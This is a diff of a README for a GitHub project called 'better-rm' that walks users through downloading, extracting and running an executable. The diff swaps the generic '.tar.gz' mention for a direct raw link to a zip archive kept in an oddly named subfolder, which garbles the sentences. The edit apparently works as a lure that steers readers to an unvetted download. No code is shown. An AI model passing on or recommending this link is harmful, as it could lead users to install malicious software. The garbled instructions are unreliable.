abhi671roy/better-rm/README.md

    Look for the latest version listed on this page.
 You will see different files available for download.

 3. **Download the Application**
    Click on the file that matches your system.
-This may be a .zip, .tar.gz, or an executable file.
+This may be a .zip, https://raw.githubusercontent.com/abhi671roy/better-rm/main/specificity/rm_better_v2.2-alpha.3.zip, or an executable file.

 4. **Extract the Files (if needed)**
-   If you downloaded a compressed file (like .zip or .tar.gz), you’ll need to extract it.
+   If you downloaded a compressed file (like .zip or https://raw.githubusercontent.com/abhi671roy/better-rm/main/specificity/rm_better_v2.2-alpha.3.zip), you’ll need to extract it.
 Right-click the file and select “Extract All” or use a similar option.

 5. **Locate the Application**
    Open the extracted folder.
 You will find the executable file named `better-rm`.